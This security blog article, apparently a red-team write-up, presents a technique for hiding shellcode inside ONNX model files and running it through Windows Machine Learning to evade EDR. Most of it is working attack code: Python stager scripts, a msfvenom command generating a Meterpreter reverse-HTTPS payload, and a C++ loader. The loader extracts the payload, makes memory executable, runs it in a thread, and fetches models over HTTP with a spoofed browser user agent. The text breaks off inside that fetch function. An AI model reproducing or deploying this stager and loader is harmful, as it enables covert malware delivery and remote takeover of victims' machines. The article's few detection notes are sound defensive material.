A New Evasion Technique: Abusing Windows Machine Learning (WinML) to Run Malicious Payloads Covertly in Memory

Posted by admin, 2026-05-11 06:40:23 · Security articles · Source: ZONE.CI

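Summary: This article describes a technique that abuses the Windows Machine Learning framework (WinML) to keep a malicious payload from being detected. The attacker embeds shellcode in the Protobuf structure of a valid ONNX model (for example in metadata_props or initializer.raw_data), loads the model from memory through the WinML API, and then runs the payload, with the aim of getting past EDR behavioral detection. The article includes Python code for building the ONNX model and C++ code for extracting the payload, and shows how the call chain is made to resemble an ordinary machine learning inference task. Overall score: 87. Categories: evasion, malware, red team, vulnerability analysis, binary security.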


老鑫安全 (original article)

10 May 2026, 12:19 · Hong Kong, China

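Attackers can abuse the machine learning framework built into Windows, hiding malicious payloads inside valid ONNX model files to get past EDR behavioral detection.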


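Introduction

The arms race between red teams and EDR never stops: EDR vendors keep getting better at flagging suspicious API call sequences, shellcode patterns, and reflective loaders. Meanwhile, Windows keeps shipping new legitimate subsystems, and few of them have been audited in depth from an attacker's point of view.

Windows Machine Learning (WinML), built in since Windows 10 1809 (build 17763), is one such overlooked subsystem. It gives applications a local C++/WinRT API for loading and running machine learning models in ONNX format. WinML now ships with every current Windows installation, and many "AI-enabled" desktop applications use it. Yet few security products appear to examine its behavior closely.

This article walks through an attack technique built on WinML:

  • Build a valid ONNX model with an arbitrary payload embedded in its Protobuf structure
  • Load the model straight from memory through the WinML API, without writing the model to disk
  • Extract and execute the payload while making the call chain resemble an ordinary machine learning inference task

Complete POC code is provided. The goal is a binary whose import table, API call pattern, and runtime behavior resemble those of a normal ML inference application; the detection section later in the article covers where that resemblance breaks down.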


Why WinML? The Attacker's View

✅ Legitimate import table

When you link windowsapp.lib and use the WinML headers, the binary's import table shows:

windowsapp.dll
  - RoGetActivationFactory
  - RoInitialize
  - WindowsCreateString
  ...

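These are the same imports found in hundreds of legitimate ML applications: photo editors, accessibility tools, background segmentation in video conferencing. (In practice, linking windowsapp.lib usually resolves these functions to API-set DLLs such as api-ms-win-core-winrt-l1-1-0.dll rather than to a file literally named windowsapp.dll, so check the import table of a built sample.) WinRT activation imports on their own are unlikely to be flagged by an EDR.

✅ Behavioral blending

At runtime, the WinML load path produces:

  • ETW events from the Microsoft-Windows-AI-MachineLearning provider (model load)
  • COM activation traces (Windows.AI.MachineLearning.LearningModel)
  • Verbose ONNX Runtime logging

A behavioral analysis system sees an application loading an ML model, which looks routine.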

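✅ No suspicious memory pattern

Unlike reflective DLL injection or manual PE mapping, loading an ONNX model through WinML runs on Microsoft's own code path. Memory for the model is allocated inside onnxruntime.dll rather than by a hand-written VirtualAlloc + memcpy sequence. This holds only for the model-loading stage: the loader shown later still allocates memory and marks it executable itself when it runs the payload.

✅ Content-Type camouflage

ONNX models sent over the network usually carry a Content-Type of application/octet-stream or application/x-protobuf, the same as ordinary model downloads. Many ML applications pull models from cloud endpoints, and network monitoring tools generally have no signature for a "malicious ONNX model".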


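A Closer Look at the ONNX Protobuf Format

Before embedding a payload, we need to understand the ONNX container format. ONNX is serialized with Protocol Buffers (protobuf), and the top-level structure is ModelProto: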

message ModelProto {
  int64 ir_version = 1;          // IR version (8 in this article's examples)
  repeated OperatorSetIdProto opset_import = 8;
  GraphProto graph = 7;          // computation graph
  repeated StringStringEntryProto metadata_props = 14;  // ← our target
}

message GraphProto {
  repeated NodeProto node = 1;   // operators
  string name = 2;               // graph name
  repeated ValueInfoProto input = 11;
  repeated ValueInfoProto output = 12;
  repeated TensorProto initializer = 5;  // ← another target
}

message TensorProto {
  repeated int64 dims = 1;
  int32 data_type = 2;
  string name = 8;
  bytes raw_data = 9;            // ← raw-bytes target (field 9 in onnx.proto; field 13 is external_data)
}

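Three natural embedding points:

| Location | Field | Capacity | Stealth |
| --- | --- | --- | --- |
| metadata_props | ModelProto field 14 | Any number of key-value pairs | High: inference engines ignore metadata |
| initializer.raw_data | TensorProto field 9 | Arbitrary byte array | Very high: looks like model weights |
| NodeProto.attribute | NodeProto field 5 | Byte tensor | Medium: an unusually large attribute may draw attention |

The raw_data approach is the most interesting: weight tensors routinely hold megabytes of floating-point data, so 50 KB of shellcode among them is hard to notice from size alone. The values themselves are a different matter: arbitrary bytes reinterpreted as float32 span the whole exponent range and can include NaN and infinity, which trained weights rarely do.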
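For analysts who want to see how a model's bytes are distributed across these fields, the top level of a ModelProto can be walked with a few lines of protobuf wire-format decoding. The sketch below is an illustration under assumptions, not code from the original article: the names `read_varint` and `top_level_field_sizes` are hypothetical, and only wire types 0, 1, 2, and 5 are handled.

```python
from __future__ import annotations

from collections import defaultdict


def read_varint(buf: bytes, pos: int) -> tuple[int, int]:
    """Decode one base-128 varint at pos; return (value, next position)."""
    value, shift = 0, 0
    while True:
        if pos >= len(buf):
            raise ValueError("truncated varint")
        byte = buf[pos]
        pos += 1
        value |= (byte & 0x7F) << shift
        if not byte & 0x80:
            return value, pos
        shift += 7
        if shift > 63:
            raise ValueError("varint longer than 64 bits")


def top_level_field_sizes(buf: bytes) -> dict[int, int]:
    """Sum the payload bytes carried by each top-level field number."""
    sizes: dict[int, int] = defaultdict(int)
    pos = 0
    while pos < len(buf):
        tag, pos = read_varint(buf, pos)
        field, wire = tag >> 3, tag & 7
        if wire == 0:                      # varint
            start = pos
            _, pos = read_varint(buf, pos)
            length = pos - start
        elif wire == 1:                    # fixed 64-bit
            length = 8
            pos += 8
        elif wire == 5:                    # fixed 32-bit
            length = 4
            pos += 4
        elif wire == 2:                    # length-delimited
            length, pos = read_varint(buf, pos)
            pos += length
        else:
            raise ValueError(f"unsupported wire type {wire}")
        if pos > len(buf):
            raise ValueError("field runs past end of buffer")
        sizes[field] += length
    return dict(sizes)
```

In a ModelProto, field 7 is the graph and field 14 is metadata_props. Cover metadata is normally a few hundred bytes, so a file whose field 14 total rivals or exceeds its field 7 total is worth a closer look.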


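Step 1: Building the Weaponized ONNX Model (Python)

We create a minimal working ONNX model and embed the payload in one of two ways: in the metadata or in the weights.

Method A: metadata embedding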

#!/usr/bin/env python3
# onnx_stager.py - 将任意载荷嵌入合法的 ONNX 模型
import onnx
from onnx import helper, TensorProto, numpy_helper
import numpy as np
import sys
import base64

def create_staged_model(payload_path: str, output_path: str, method: str = "metadata"):
    with open(payload_path, "rb") as f:
        payload = f.read()

    # 构造一个最小但合法的计算图:Identity 节点(输入=输出)
    X = helper.make_tensor_value_info("input", TensorProto.FLOAT, [1, 3, 224, 224])
    Y = helper.make_tensor_value_info("output", TensorProto.FLOAT, [1, 3, 224, 224])
    node = helper.make_node("Identity", inputs=["input"], outputs=["output"])

    if method == "metadata":
        # 将载荷分块并 base64 编码后放入 metadata_props
        CHUNK_SIZE = 65536
        chunks = []
        for i in range(0, len(payload), CHUNK_SIZE):
            chunk = payload[i:i+CHUNK_SIZE]
            chunks.append(base64.b64encode(chunk).decode())

        metadata = {
            "model_author": "Microsoft Research",
            "model_version": "2.1.0",
            "model_description": "Image classification model for edge inference",
            "payload_chunks": str(len(chunks)),
        }
        for i, chunk in enumerate(chunks):
            metadata[f"weight_hash_{i}"] = chunk

        metadata_props = [helper.make_entry(k, v) for k, v in metadata.items()]
        graph = helper.make_graph([node], "inference_graph", [X], [Y])
        model = helper.make_model(graph, opset_imports=[helper.make_opsetid("", 13)])
        model.metadata_props.extend(metadata_props)

    elif method == "weights":
        # 将载荷填充对齐到 float32 边界,然后解释为模型权重
        padded = payload + b"\x00" * ((4 - len(payload) % 4) % 4)
        weight_array = np.frombuffer(padded, dtype=np.float32)
        total_floats = len(weight_array)
        weight_tensor = numpy_helper.from_array(
            weight_array.reshape(1, 1, 1, total_floats),
            name="conv1.weight"
        )
        size_tensor = numpy_helper.from_array(
            np.array([len(payload)], dtype=np.int64),
            name="conv1.bias"
        )
        graph = helper.make_graph(
            [node], "inference_graph", [X], [Y],
            initializer=[weight_tensor, size_tensor]
        )
        model = helper.make_model(graph, opset_imports=[helper.make_opsetid("", 13)])

    onnx.checker.check_model(model)
    onnx.save(model, output_path)
    print(f"[+] 已生成 {output_path},载荷大小:{len(payload)} 字节,模型大小:{len(model.SerializeToString())} 字节")

if __name__ == "__main__":
    create_staged_model(sys.argv[1], sys.argv[2], sys.argv[3] if len(sys.argv) > 3 else "weights")

Usage example:

# 生成原始 shellcode(比如 Cobalt Strike / Sliver / msfvenom)
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.0.0.1 LPORT=443 -f raw -o beacon.bin

# 嵌入到 ONNX 模型(使用权重张量方法)
python3 onnx_stager.py beacon.bin staged_model.onnx weights

[+] 已生成 staged_model.onnx,载荷大小:510 字节,模型大小:612 字节

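The resulting staged_model.onnx passes ONNX validation. Opened in Netron, it shows a computation graph with a single Identity node and weight tensors attached. At a glance the payload bytes look like ordinary float weights, although their value distribution (extreme magnitudes, NaN, infinity) differs from that of trained weights.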


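Step 2: Pure Protobuf Construction (No Dependencies)

In some operating environments you may not be able to install the onnx Python package. The script below builds the ONNX protobuf from scratch, with no third-party libraries: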

#!/usr/bin/env python3
# onnx_raw_stager.py - 纯手搓 ONNX protobuf,零依赖
import struct, sys, base64

def write_varint(value):
    result = bytearray()
    while value > 0x7F:
        result.append((value & 0x7F) | 0x80)
        value >>= 7
    result.append(value & 0x7F)
    return bytes(result)

def write_field(field_number, wire_type, data):
&nbsp; &nbsp; tag = write_varint((field_number <<&nbsp;3) | wire_type)
&nbsp; &nbsp; if&nbsp;wire_type ==&nbsp;0:
&nbsp; &nbsp; &nbsp; &nbsp; return&nbsp;tag + write_varint(data)
&nbsp; &nbsp; elif&nbsp;wire_type ==&nbsp;2:
&nbsp; &nbsp; &nbsp; &nbsp; return&nbsp;tag + write_varint(len(data)) + data
&nbsp; &nbsp; raise&nbsp;ValueError

def&nbsp;bytes_field(fld, data):&nbsp;return&nbsp;write_field(fld,&nbsp;2, data)
def&nbsp;string_field(fld, s):&nbsp; &nbsp;return&nbsp;bytes_field(fld, s.encode("utf-8"))
def&nbsp;varint_field(fld, val):&nbsp;return&nbsp;write_field(fld,&nbsp;0, val)

def&nbsp;build_onnx_with_payload(payload:&nbsp;bytes) ->&nbsp;bytes:
&nbsp; &nbsp; # 构造一个 Identity 计算图
&nbsp; &nbsp; dim = varint_field(1,&nbsp;1)
&nbsp; &nbsp; shape = bytes_field(1, dim)
&nbsp; &nbsp; tensor_type = varint_field(1,&nbsp;1) + bytes_field(2, shape)
&nbsp; &nbsp; type_proto = bytes_field(1, tensor_type)
&nbsp; &nbsp; vi_input = string_field(1,&nbsp;"input") + bytes_field(2, type_proto)
&nbsp; &nbsp; vi_output = string_field(1,&nbsp;"output") + bytes_field(2, type_proto)
&nbsp; &nbsp; node = string_field(1,&nbsp;"input") + string_field(2,&nbsp;"output") + string_field(4,&nbsp;"Identity")
&nbsp; &nbsp; graph = (bytes_field(1, node) + string_field(2,&nbsp;"model") +
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;bytes_field(11, vi_input) + bytes_field(12, vi_output))
&nbsp; &nbsp; opset = varint_field(2,&nbsp;13)
&nbsp; &nbsp; model = varint_field(1,&nbsp;8) + bytes_field(8, opset) + bytes_field(7, graph)

&nbsp; &nbsp; # 将载荷分块 base64 后放入 metadata_props
&nbsp; &nbsp; CHUNK =&nbsp;65536
&nbsp; &nbsp; chunks = [payload[i:i+CHUNK]&nbsp;for&nbsp;i&nbsp;in&nbsp;range(0,&nbsp;len(payload), CHUNK)]
&nbsp; &nbsp; cover = [("producer_name",&nbsp;"Microsoft.ML.OnnxRuntime"), ("version",&nbsp;"1.16.0"),
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;("description",&nbsp;"Optimized vision model"), ("payload_size",&nbsp;str(len(payload))),
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;("chunk_count",&nbsp;str(len(chunks)))]
&nbsp; &nbsp; for&nbsp;k, v&nbsp;in&nbsp;cover:
&nbsp; &nbsp; &nbsp; &nbsp; model += bytes_field(14, string_field(1, k) + string_field(2, v))
&nbsp; &nbsp; for&nbsp;i, chunk&nbsp;in&nbsp;enumerate(chunks):
&nbsp; &nbsp; &nbsp; &nbsp; b64 = base64.b64encode(chunk).decode()
&nbsp; &nbsp; &nbsp; &nbsp; entry = string_field(1,&nbsp;f"weight_hash_{i}") + string_field(2, b64)
&nbsp; &nbsp; &nbsp; &nbsp; model += bytes_field(14, entry)
&nbsp; &nbsp; return&nbsp;model

if&nbsp;__name__ ==&nbsp;"__main__":
&nbsp; &nbsp; with&nbsp;open(sys.argv[1],&nbsp;"rb")&nbsp;as&nbsp;f:
&nbsp; &nbsp; &nbsp; &nbsp; payload = f.read()
&nbsp; &nbsp; model_bytes = build_onnx_with_payload(payload)
&nbsp; &nbsp; with&nbsp;open(sys.argv[2],&nbsp;"wb")&nbsp;as&nbsp;f:
&nbsp; &nbsp; &nbsp; &nbsp; f.write(model_bytes)
&nbsp; &nbsp; print(f"[+]&nbsp;{sys.argv[2]}:&nbsp;{len(model_bytes)}&nbsp;字节(载荷:{len(payload)}&nbsp;字节)")

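The model this script produces follows the same Protobuf layout as one built with the onnx library, though it is not byte-identical to the Step 1 output (the graph name and cover metadata differ, for example). It needs only the Python standard library, so it runs in minimal environments.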


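Step 3: The WinML Loader (C++)

On the target machine, we use Microsoft's official WinML API to load the crafted ONNX model, extract the payload from the protobuf metadata, and execute it.

Headers and libraries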

// winml_loader.cpp
#define&nbsp;WIN32_LEAN_AND_MEAN
#define&nbsp;NOMINMAX
#include&nbsp;<windows.h>
#include&nbsp;<winhttp.h>
#include&nbsp;<string>
#include&nbsp;<vector>
#include&nbsp;<map>
#include&nbsp;<cstdio>

#include&nbsp;<winrt/base.h>
#include&nbsp;<winrt/Windows.Foundation.h>
#include&nbsp;<winrt/Windows.AI.MachineLearning.h>
#include&nbsp;<winrt/Windows.Storage.Streams.h>

#pragma&nbsp;comment(lib,&nbsp;"windowsapp")
#pragma&nbsp;comment(lib,&nbsp;"winhttp")

using&nbsp;namespace&nbsp;winrt;
using&nbsp;namespace&nbsp;winrt::Windows::AI::MachineLearning;
using&nbsp;namespace&nbsp;winrt::Windows::Storage::Streams;

A lightweight Protobuf parser

We only care about metadata_props (field 14), so a minimal hand-written parser is enough:

namespace&nbsp;pb {
&nbsp; &nbsp;&nbsp;static&nbsp;uint64_t&nbsp;read_varint(const&nbsp;uint8_t* data,&nbsp;size_t& pos,&nbsp;size_t&nbsp;len)&nbsp;{
&nbsp; &nbsp; &nbsp; &nbsp; uint64_t&nbsp;result =&nbsp;0;&nbsp;int&nbsp;shift =&nbsp;0;
&nbsp; &nbsp; &nbsp; &nbsp; while&nbsp;(pos < len) {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; uint8_t&nbsp;b = data[pos++];
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; result |= (uint64_t)(b &&nbsp;0x7F) << shift;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; if&nbsp;(!(b &&nbsp;0x80))&nbsp;break;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; shift +=&nbsp;7;
&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; return&nbsp;result;
&nbsp; &nbsp; }
}

static&nbsp;std::map<std::string, std::string>&nbsp;parse_onnx_metadata(const&nbsp;std::vector<uint8_t>& data)&nbsp;{
&nbsp; &nbsp; std::map<std::string, std::string> metadata;
&nbsp; &nbsp; size_t&nbsp;pos =&nbsp;0;
&nbsp; &nbsp; const&nbsp;uint8_t* d = data.data();
&nbsp; &nbsp; size_t&nbsp;len = data.size();

&nbsp; &nbsp; while&nbsp;(pos < len) {
&nbsp; &nbsp; &nbsp; &nbsp; uint64_t&nbsp;tag = pb::read_varint(d, pos, len);
&nbsp; &nbsp; &nbsp; &nbsp; uint32_t&nbsp;field = (uint32_t)(tag >>&nbsp;3);
&nbsp; &nbsp; &nbsp; &nbsp; uint32_t&nbsp;wire &nbsp;= (uint32_t)(tag &&nbsp;7);

&nbsp; &nbsp; &nbsp; &nbsp; if&nbsp;(wire ==&nbsp;2) {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; uint64_t&nbsp;flen = pb::read_varint(d, pos, len);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; if&nbsp;(field ==&nbsp;14) {&nbsp; // metadata_props
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; std::string key, value;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; size_t&nbsp;iend = pos + (size_t)flen;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; size_t&nbsp;ipos = pos;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; while&nbsp;(ipos < iend) {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; uint64_t&nbsp;itag = pb::read_varint(d, ipos, iend);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; uint32_t&nbsp;inum &nbsp;= (uint32_t)(itag >>&nbsp;3);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; uint32_t&nbsp;iwire = (uint32_t)(itag &&nbsp;7);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; if&nbsp;(iwire ==&nbsp;2) {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; uint64_t&nbsp;slen = pb::read_varint(d, ipos, iend);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; std::string&nbsp;s((const&nbsp;char*)(d + ipos), (size_t)slen);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ipos += (size_t)slen;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; if&nbsp;(inum ==&nbsp;1) key = s;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; else&nbsp;if&nbsp;(inum ==&nbsp;2) value = s;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }&nbsp;else&nbsp;if&nbsp;(iwire ==&nbsp;0) {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; pb::read_varint(d, ipos, iend);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }&nbsp;else&nbsp;break;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; if&nbsp;(!key.empty()) metadata[key] = value;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; pos += (size_t)flen;
&nbsp; &nbsp; &nbsp; &nbsp; }&nbsp;else&nbsp;if&nbsp;(wire ==&nbsp;0&nbsp;|| wire ==&nbsp;1&nbsp;|| wire ==&nbsp;5) {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; // 跳过其他类型
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; if&nbsp;(wire ==&nbsp;0) pb::read_varint(d, pos, len);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; else&nbsp;if&nbsp;(wire ==&nbsp;1) pos +=&nbsp;8;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; else&nbsp;if&nbsp;(wire ==&nbsp;5) pos +=&nbsp;4;
&nbsp; &nbsp; &nbsp; &nbsp; }&nbsp;else&nbsp;break;
&nbsp; &nbsp; }
&nbsp; &nbsp; return&nbsp;metadata;
}

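Loading the model from memory (the key step)

This is the core of the technique: InMemoryRandomAccessStream loads the ONNX model directly from bytes in memory, so the model never touches disk.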

static&nbsp;bool&nbsp;load_model_winml(const&nbsp;std::vector<uint8_t>& model_bytes)&nbsp;{
&nbsp; &nbsp; try&nbsp;{
&nbsp; &nbsp; &nbsp; &nbsp; InMemoryRandomAccessStream stream;
&nbsp; &nbsp; &nbsp; &nbsp; DataWriter&nbsp;writer(stream);
&nbsp; &nbsp; &nbsp; &nbsp; writer.WriteBytes(winrt::array_view<const&nbsp;uint8_t>(model_bytes));
&nbsp; &nbsp; &nbsp; &nbsp; writer.StoreAsync().get();
&nbsp; &nbsp; &nbsp; &nbsp; writer.FlushAsync().get();
&nbsp; &nbsp; &nbsp; &nbsp; writer.DetachStream();
&nbsp; &nbsp; &nbsp; &nbsp; stream.Seek(0);

&nbsp; &nbsp; &nbsp; &nbsp; auto&nbsp;ref = RandomAccessStreamReference::CreateFromStream(stream);
&nbsp; &nbsp; &nbsp; &nbsp; auto&nbsp;model = LearningModel::LoadFromStream(ref);

&nbsp; &nbsp; &nbsp; &nbsp; // 此时:
&nbsp; &nbsp; &nbsp; &nbsp; // - ETW 会产生 "Microsoft.AI.MachineLearning" 模型加载事件
&nbsp; &nbsp; &nbsp; &nbsp; // - 进程映射了合法的 WinML DLL(onnxruntime.dll 等)
&nbsp; &nbsp; &nbsp; &nbsp; // - 行为分析会看到正常的 ML 推理工作负载
&nbsp; &nbsp; &nbsp; &nbsp; printf("[+] WinML 模型已加载:%ws\n", model.Name().c_str());
&nbsp; &nbsp; &nbsp; &nbsp; return&nbsp;true;
&nbsp; &nbsp; }&nbsp;catch&nbsp;(const&nbsp;winrt::hresult_error& e) {
&nbsp; &nbsp; &nbsp; &nbsp; printf("[-] WinML 加载失败:0x%08X\n", (uint32_t)e.code());
&nbsp; &nbsp; &nbsp; &nbsp; return&nbsp;false;
&nbsp; &nbsp; }
}

Payload extraction and execution

static&nbsp;std::vector<uint8_t>&nbsp;b64_decode(const&nbsp;std::string& s)&nbsp;{
&nbsp; &nbsp; static&nbsp;const&nbsp;char&nbsp;b64[] =&nbsp;"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
&nbsp; &nbsp; int&nbsp;T[256];&nbsp;memset(T,&nbsp;-1,&nbsp;sizeof(T));
&nbsp; &nbsp; for&nbsp;(int&nbsp;i =&nbsp;0; i <&nbsp;64; i++) T[(unsigned&nbsp;char)b64[i]] = i;
&nbsp; &nbsp; std::vector<uint8_t> out;
&nbsp; &nbsp; int&nbsp;val =&nbsp;0, bits =&nbsp;-8;
&nbsp; &nbsp; for&nbsp;(unsigned&nbsp;char&nbsp;c : s) {
&nbsp; &nbsp; &nbsp; &nbsp; if&nbsp;(T[c] ==&nbsp;-1)&nbsp;break;
&nbsp; &nbsp; &nbsp; &nbsp; val = (val <<&nbsp;6) + T[c];
&nbsp; &nbsp; &nbsp; &nbsp; bits +=&nbsp;6;
&nbsp; &nbsp; &nbsp; &nbsp; if&nbsp;(bits >=&nbsp;0) {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; out.push_back((uint8_t)((val >> bits) &&nbsp;0xFF));
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; bits -=&nbsp;8;
&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; }
&nbsp; &nbsp; return&nbsp;out;
}

static&nbsp;bool&nbsp;extract_and_execute(const&nbsp;std::vector<uint8_t>& model_bytes)&nbsp;{
&nbsp; &nbsp; auto&nbsp;metadata =&nbsp;parse_onnx_metadata(model_bytes);
&nbsp; &nbsp; int&nbsp;payload_size = std::stoi(metadata["payload_size"]);
&nbsp; &nbsp; int&nbsp;chunk_count = std::stoi(metadata["chunk_count"]);
&nbsp; &nbsp; if&nbsp;(payload_size ==&nbsp;0&nbsp;|| chunk_count ==&nbsp;0)&nbsp;return&nbsp;false;

&nbsp; &nbsp; std::vector<uint8_t> payload;
&nbsp; &nbsp; payload.reserve(payload_size);
&nbsp; &nbsp; for&nbsp;(int&nbsp;i =&nbsp;0; i < chunk_count; i++) {
&nbsp; &nbsp; &nbsp; &nbsp; std::string key =&nbsp;"weight_hash_"&nbsp;+ std::to_string(i);
&nbsp; &nbsp; &nbsp; &nbsp; auto&nbsp;chunk =&nbsp;b64_decode(metadata[key]);
&nbsp; &nbsp; &nbsp; &nbsp; payload.insert(payload.end(), chunk.begin(), chunk.end());
&nbsp; &nbsp; }
&nbsp; &nbsp; if&nbsp;(payload.size() > (size_t)payload_size) payload.resize(payload_size);
&nbsp; &nbsp; printf("[+] 已提取载荷:%zu 字节,来自 %d 个分块\n", payload.size(), chunk_count);

&nbsp; &nbsp; // 执行载荷
&nbsp; &nbsp; void* exec_mem =&nbsp;VirtualAlloc(NULL, payload.size(), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
&nbsp; &nbsp; if&nbsp;(!exec_mem)&nbsp;return&nbsp;false;
&nbsp; &nbsp; memcpy(exec_mem, payload.data(), payload.size());
&nbsp; &nbsp; DWORD old_protect;
&nbsp; &nbsp; VirtualProtect(exec_mem, payload.size(), PAGE_EXECUTE_READ, &old_protect);
&nbsp; &nbsp; HANDLE hThread =&nbsp;CreateThread(NULL,&nbsp;0, (LPTHREAD_START_ROUTINE)exec_mem,&nbsp;NULL,&nbsp;0,&nbsp;NULL);
&nbsp; &nbsp; if&nbsp;(hThread) {
&nbsp; &nbsp; &nbsp; &nbsp; printf("[+] 载荷正在线程 %lu 中执行\n",&nbsp;GetThreadId(hThread));
&nbsp; &nbsp; &nbsp; &nbsp; WaitForSingleObject(hThread, INFINITE);
&nbsp; &nbsp; &nbsp; &nbsp; CloseHandle(hThread);
&nbsp; &nbsp; }
&nbsp; &nbsp; VirtualFree(exec_mem,&nbsp;0, MEM_RELEASE);
&nbsp; &nbsp; return&nbsp;true;
}

Fetching the model over the network (mimicking a normal download)

static&nbsp;std::vector<uint8_t>&nbsp;fetch_model(const&nbsp;wchar_t* host, INTERNET_PORT port,
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;const&nbsp;wchar_t* path,&nbsp;bool&nbsp;tls)&nbsp;{
&nbsp; &nbsp; std::vector<uint8_t> result;
&nbsp; &nbsp; HINTERNET hSess =&nbsp;WinHttpOpen(L"Mozilla/5.0 (Windows NT 10.0; Win64; x64) Edge/120.0",
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,&nbsp;NULL,&nbsp;NULL,&nbsp;0);
&nbsp; &nbsp; if&nbsp;(!hSess)&nbsp;return&nbsp;result;
&nbsp; &nbsp; HINTERNET hConn =&nbsp;WinHttpConnect(hSess, host, port,&nbsp;0);
&nbsp; &nbsp; if&nbsp;(!hConn) {&nbsp;WinHttpCloseHandle(hSess);&nbsp;return&nbsp;result; }
&nbsp; &nbsp; DWORD flags = tls ? WINHTTP_FLAG_SECURE :&nbsp;0;
&nbsp; &nbsp; HINTERNET hReq =&nbsp;WinHttpOpenRequest(hConn,&nbsp;L"GET", path,&nbsp;NULL,
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; WINHTTP_NO_REFERER, WINHTTP_DEFAULT_ACCEPT_TYPES, flags);
&nbsp; &nbsp; if&nbsp;(!hReq) {&nbsp;WinHttpCloseHandle(hConn);&nbsp;WinHttpCloseHandle(hSess);&nbsp;return&nbsp;result; }
&nbsp; &nbsp; WinHttpAddRequestHeaders(hReq,&nbsp;L"Accept: application/octet-stream, application/x-protobuf\r\n",
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;-1L, WINHTTP_ADDREQ_FLAG_ADD);
&nbsp; &nbsp; if&nbsp;(WinHttpSendRequest(hReq,&nbsp;NULL,&nbsp;0,&nbsp;NULL,&nbsp;0,&nbsp;0,&nbsp;0) &&&nbsp;WinHttpReceiveResponse(hReq,&nbsp;NULL)) {
&nbsp; &nbsp; &nbsp; &nbsp; DWORD avail =&nbsp;0;
&nbsp; &nbsp; &nbsp; &nbsp; do&nbsp;{
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; WinHttpQueryDataAvailable(hReq, &avail);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; if&nbsp;(avail >&nbsp;0) {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; std::vector<uint8_t>&nbsp;chunk(avail);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; DWORD rd =&nbsp;0;
